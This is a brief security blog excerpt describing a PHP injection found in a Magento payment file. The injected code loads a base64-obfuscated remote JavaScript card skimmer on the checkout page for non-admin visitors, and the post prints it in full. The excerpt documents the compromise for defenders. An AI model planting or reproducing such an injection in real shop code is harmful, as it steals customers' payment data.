A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php
...
if ($_SERVER["REQUEST_METHOD"] === "GET"){
if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){
if(!isset($_COOKIE["adminhtml"])){
echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));
}
}
}
To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents and the URL obfuscated with base64.
Continue reading Magento PHP Injection Loads JavaScript Skimmer at Sucuri Blog.
The post Magento PHP Injection Loads JavaScript Skimmer appeared first on Security Boulevard.
Article Link: https://securityboulevard.com/2021/01/magento-php-injection-loads-javascript-skimmer/